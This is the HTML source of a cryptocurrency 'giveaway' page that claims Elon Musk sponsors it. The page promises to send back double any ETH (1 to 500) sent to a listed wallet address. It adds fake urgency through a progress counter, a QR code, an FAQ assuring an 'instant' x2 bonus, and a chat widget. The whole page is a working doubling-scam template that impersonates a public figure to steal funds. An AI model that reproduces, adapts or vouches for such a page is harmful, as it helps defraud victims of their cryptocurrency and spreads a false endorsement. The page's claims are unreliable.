
<!DOCTYPE html>
<html lang="en">
  
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Ethereum Giveaway</title>
    <link rel="preconnect" href="https://fonts.gstatic.com/" />
    <link
      href="https://fonts.googleapis.com/css2?family=Montserrat:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="/assets/style.css" />
    <link rel="stylesheet" href="/assets/animate.css" />
    <link rel="stylesheet" href="/assets/toast.min.css" />
    <link rel="shortcut icon" href="/assets/coin-eth.png" type="image/x-icon" />
    <link rel="stylesheet" href="/assets/all.min.css" />
  </head>
  <body>
    <div class="mob_menu">
      <div class="close"><i class="fas fa-times"></i></div>

      <div class="cont"></div>
    </div>
    <header>
      <div class="container">
        <object type="image/svg+xml" data="/assets/logotype-eth.svg" class="logo"></object>
        <div class="infos">
          <div class="info profile">
            <div class="icon"><object type="image/svg+xml" data="/assets/user.svg"></object></div>
            Ethereum
          </div>
          <div class="info balance">
            <div class="icon"><object type="image/svg+xml" data="/assets/gems.svg"></object></div>
            50,000 ETH
          </div>
        </div>
        <div class="open_menu"><i class="fas fa-bars"></i></div>
      </div>
    </header>
    <div class="container">
      <nav>
        <ul>
          <li><a href="#event">Event 2022</a></li>
          <li><a href="#give">Giveaway</a></li>
          <li><a href="#rules">Rules</a></li>
          <li><a href="#faq">FAQ</a></li>
          <li><a href="#transactions">Transactions</a></li>
        </ul>
      </nav>
    </div>
    <main id="event">
      <div class="container">
        <div class="profile wow fadeInLeft">
          <div class="avatar">
            <div
              class="image"
              style="
                background-image: url('/assets/heftige-kritik-an-elon-musk.jpg');
                width: 100%;
                height: 100%;
                background-size: cover;
                background-position: center;
              "
            ></div>
            <span><object type="image/svg+xml" data="/assets/ethereum.svg"></object></span>
          </div>
          <p>Elon Musk</p>
          <span>Main sponsor of this event</span>
          <a href="#rules" class="more">More info</a>
        </div>
        <div class="right">
          <h1 class="wow fadeInRight" data-wow-delay="0.1s">
            Hurry up and take part in the giveaway of
            <span style="display: inline-block">50,000 ETH</span>
          </h1>
          <p class="wow fadeInRight" data-wow-delay="0.3s">
            During this unique event we will give you a chance to <br />
            win 50,000 ETH, have a look at the rules and <br />
            don't miss on your chance!
          </p>
          <ul>
            <li class="wow fadeInUp" data-wow-delay="0.5s">Price Predictions</li>
            <li class="wow fadeInUp" data-wow-delay="0.7s">Marketplace</li>
            <li class="wow fadeInUp" data-wow-delay="0.9s">Live Event</li>
          </ul>
          <a href="#give" class="give wow fadeInUp" data-wow-delay="1s">Participate in the giveaway</a>
        </div>
      </div>
    </main>
    <section id="rules" class="info_site">
      <div class="container">
        <div class="col">
          <div class="info big wow fadeInUp" data-wow-delay="0.1s">
            <p class="title">For example</p>
            <ul>
              
                <li>If you send 1+ ETH, you will get 2+ ETH back.</li>
              
                <li>If you send 5+ ETH, you will get 10+ ETH back.</li>
              
                <li>If you send 10+ ETH, you will get 20+ ETH back.</li>
              
                <li>If you send 50+ ETH, you will get 100+ ETH back.</li>
              
                <li>If you send 200+ ETH, you will get 400+ ETH back.</li>
              
                <li>If you send 500+ ETH, you will get 1,000+ ETH back.</li>
              
            </ul>
          </div>
        </div>
        <div class="col">
          <div class="info sm wow fadeInUp" data-wow-delay="0.2s">
            <p class="title">About</p>
            <p class="text">
              We believe that Blockchain and Ethereum will make the world more fair. To speed up the process of
              cryptocurrency mass adoption, We decided to run 50,000 ETH giveaway.
            </p>
          </div>
          <div class="info sm wow fadeInUp" data-wow-delay="0.4s">
            <p class="title">Rules</p>
            <p class="text">
              To participate you just need to send from 1 ETH to 500 ETH to the contribution address and we will immediately send you back
              <span style="display: inline-block">2 ETH</span> to
              <span>1,000</span> ETH (x2) to the address you sent it from.
            </p>
          </div>
        </div>
      </div>
    </section>
    <section id="give" class="send">
      <div class="container">
        <div class="col">
          <span class="wow fadeInLeft" data-wow-delay="0.3s">Hurry up and take part in the giveaway!</span>
          <div class="adress">
            <p class="wow fadeInLeft" data-wow-delay="0.5s">You can send ETH to the following address:</p>
            <div class="inp_adr wow fadeInLeft" data-wow-delay="0.7s">
              <span style="color: white">0xc7Fd7F42A477E994Dbb71028504a0774E9D9765c</span>
              <div class="icon" onclick="CopyToClipboard('wallet');">
                <object type="image/svg+xml" data="/assets/copy.svg"></object>
              </div>
            </div>
            <p class="wait wow fadeInLeft" data-wow-delay="0.9s">Waiting for payment</p>
          </div>
        </div>
        <div class="col">
          <div class="progress wow fadeInRight" data-wow-delay="0.1s" style="position: relative">
            <span class="perc" id="percent">68%</span>
            <div class="cont">
              <span id="ost_line">50000</span>
              <span>50,000</span>
            </div>
            <div class="qr wow fadeInUp" data-wow-delay="0.5s" style="width: 212px; height: 320px">
              <img
                src="qrcode.gb9E4Y9wlo.png"
                alt=""
                style="
                  border-image: url('/assets/9t6NH3X.png') 12;
                  border-style: solid;
                  border-width: 12px;
                  border-radius: 10px;
                  padding: 5px;
                  background: white;
                  max-width: 100%;
                "
              />
              <p>Use this QR code</p>
              <span
                >or ETH address <br />
                to participate</span
              >
            </div>
            <svg viewBox="0 0 36 36" class="circular-chart" style="z-index: -1">
              <path
                class="circle bg"
                stroke-dasharray="100, 100"
                d="M18 2.0845
                            a 15.9155 15.9155 0 0 1 0 31.831
                            a 15.9155 15.9155 0 0 1 0 -31.831"
              />
            </svg>
            <svg id="progress" viewBox="0 0 36 36" class="circular-chart">
              <path
                class="circle"
                stroke-dasharray="60, 100"
                d="M18 2.0845
                            a 15.9155 15.9155 0 0 1 0 31.831
                            a 15.9155 15.9155 0 0 1 0 -31.831"
              />
            </svg>
          </div>
        </div>
      </div>
    </section>
    <section id="faq" class="faq">
      <div class="items">
        <div class="item wow fadeInUp">
          <span>What do I have to do to participate in the giveaway?</span>
          <div class="text">
            <p>
              To participate you just need to send from 1 ETH to 500 ETH to the contribution address and we will immediately send you back 2 ETH to
              1,000 ETH (x2) to the address you sent it from.
            </p>
          </div>
        </div>
        <div class="item wow fadeInUp">
          <span>How long will it take me to get my bonus?</span>
          <div class="text">
            <p>
              You get your x2 bonus instantly! The system is fully automated, so all transactions are sent without
              delay!
            </p>
          </div>
        </div>
        <div class="item wow fadeInUp">
          <span>Who is the sponsor of this giveaway?</span>
          <div class="text">
            <p>The main sponsor of this event is Elon Musk</p>
          </div>
        </div>
        <div class="item wow fadeInUp">
          <span>How many times can I participate in the giveaway?</span>
          <div class="text">
            <p>You can only participate once.</p>
          </div>
        </div>
        <div class="item wow fadeInUp">
          <span>How do I get my bonus?</span>
          <div class="text">
            <p>
              The system will automatically send the bonus to the wallet from which you participated in the giveaway.
            </p>
          </div>
        </div>
      </div>
    </section>
    <section id="transactions" class="transactions">
      <div class="container">
        <h2>Transactions for Address</h2>
        <span class="adress" id="wallet">0xc7Fd7F42A477E994Dbb71028504a0774E9D9765c</span>
        <div id="Transactions" class="transaction-container">
          <div class="transaction-table">
            <div class="table-body"></div>
          </div>
        </div>
      </div>
    </section>
    <footer>
      <object type="image/svg+xml" data="/assets/logotype.svg"></object>
      <ul>
        <li><a href="#event">Event 2022</a></li>
        <li><a href="#give">Giveaway</a></li>
        <li><a href="#rules">Rules</a></li>
        <li><a href="#faq">FAQ</a></li>
        <li><a href="#transactions">Transactions</a></li>
      </ul>
    </footer>
    <div id="countdown" hidden>
      <span class="days"></span>
      <span class="tt">:</span>
      <span class="hours"></span>
      <span class="tt">:</span>
      <span class="minutes"></span>
      <span class="tt">:</span>
      <span class="seconds"></span>
    </div>
    <div hidden id="overTime"></div>
    <script src="/assets/jquery-3.5.1.min.js"></script>
    <script src="/assets/jquery-ui.min.js"></script>
    <script src="/assets/jquery.cookie.min.js"></script>
    <script>
      window.wallet = '0xc7Fd7F42A477E994Dbb71028504a0774E9D9765c';
      window.minimum = +'1';
      window.maximum = +'500';
      window.defaultValue = 1;
      window.cur = 'eth';
      window.giveawayAmount = +'50000';
      window.giveawaySent = +'16078.949999999997';
    </script>
    <script src="/assets/toast.min.js"></script>
    <script src="/assets/new.js"></script>
    
      <!--Start of Tawk.to Script--><script type="text/javascript">var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();(function(){var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];s1.async=true;s1.src='https://embed.tawk.to/6278ef40b0d10b6f3e7146a2/1g2k6d514';s1.charset='UTF-8';s1.setAttribute('crossorigin','*');s0.parentNode.insertBefore(s1,s0);})();</script><!--End of Tawk.to Script-->
    
  </body>

</html>
